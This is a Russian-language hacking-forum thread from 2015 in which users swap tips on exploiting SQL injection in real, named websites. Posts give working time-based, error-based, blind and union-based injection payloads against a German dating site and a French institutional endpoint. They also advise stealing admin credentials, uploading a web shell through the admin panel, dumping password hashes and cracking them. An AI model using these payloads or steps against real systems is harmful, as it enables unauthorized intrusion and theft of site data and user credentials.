ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

05.03.2015, 10:24
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от Xsite
Xsite said:
Ребят помогите советом )
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
Есть замечательный вектор превращения Time-Based в Error-Based. Работает много где.
Могу показать, если дашь линк.
|
|
|

05.03.2015, 10:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 216062
Репутация:
231
|
|
Сообщение от None
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
Выковыривай админа и пробуй залить шелл через админку или если в самой админке есть сделать бэкап бд. так же не забывай про --passwords --users --hostname при удачном стечении обстоятельств можно подключиться напрямую к бд )
2BigBear на таком получится?
GET /registrierung/step0_vip.html HTTP/1.1
Cookie: PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=*; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
X-Requested-With: XMLHttpRequest
Referer: http://www.-----.de:80/
Host: www.lovepoint.de
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Вектор PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=') AND SLEEP(5) AND ('KgRw'='KgRw; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
|
|
|
|

05.03.2015, 13:28
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Вот пример из выше, сайт затер
http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)= 5,1,(select+1+union+select+2))=%271
TRUE - нет ошибки
http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)= 4,1,(select+1+union+select+2))=%271
FASLE - есть ошибка
Сообщение от grimnir
grimnir said:
Выковыривай админа и пробуй залить шелл через админку или если в самой админке есть сделать бэкап бд. так же не забывай про --passwords --users --hostname при удачном стечении обстоятельств можно подключиться напрямую к бд )
2BigBear на таком получится?
GET /registrierung/step0_vip.html HTTP/1.1
Cookie: PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=*; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
X-Requested-With: XMLHttpRequest
Referer: http://www.lovepoint.de:80/
Host: www.lovepoint.de
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Вектор PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=') AND SLEEP(5) AND ('KgRw'='KgRw; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
На этом попробуй также
|
|
|

06.03.2015, 16:49
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме: 961428
Репутация:
662
|
|
http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319
хелп
|
|
|

06.03.2015, 17:39
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме: 1066435
Репутация:
1013
|
|
Сообщение от DezMond™
DezMond™ said:
http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319
хелп
blind-mssql
Код:
Code:
http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319%20waitfor%20delay%20%270:0:10%27--+
union-based mssql:
Код:
Code:
http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=-2012319%20UNION%20ALL%20SELECT%20@@version,%27lol%27--
тыкаешь на lol, смотришь вывод
|
|
|

07.03.2015, 19:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 26437
Репутация:
-2
|
|
Привет. Посоветуйте, что дальше делать если нашел на сайте phpinfo. Вроде инфа там написана, а что делать не знаю
|
|
|
|

07.03.2015, 19:37
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от teh
teh said:
Привет. Посоветуйте, что дальше делать если нашел на сайте phpinfo. Вроде инфа там написана, а что делать не знаю
Попей чаю, посмотри фильм, познай дзен в конце концов.
Вывод функции phpinfo() раскрывает лишь служебную информацию, такую как настройки определённых переменных и полные пути к скриптам на сайте.
Имея только чистый phpinfo() максимум, что можно провести Reflected-XSS через URL в старых версиях.
Обычно этот файл используется в совокупности с другими уязвимостями. И практически никогда (за исключением выше написанного) - без них.
|
|
|

07.03.2015, 20:26
|
|
Guest
Сообщений: n/a
Провел на форуме: 26437
Репутация:
-2
|
|
нашел в site/info.php других уязвимостей не нашел. спасибо
А если хеш пароля не могу рашифровать онлайн, как еще можно разшифровать?
|
|
|
|

08.03.2015, 00:35
|
|
Новичок
Регистрация: 29.09.2007
Сообщений: 4
Провел на форуме: 40410
Репутация:
10
|
|
еще использовать программы для расшифровки, такие как hashcat, jtr, egb
|
|
|

08.03.2015, 02:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 26437
Репутация:
-2
|
|
Еще одни вопрос. Нашел я на сайте папку manual -> site/manual/ здесь что то про apache. Можно что то вытащить?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|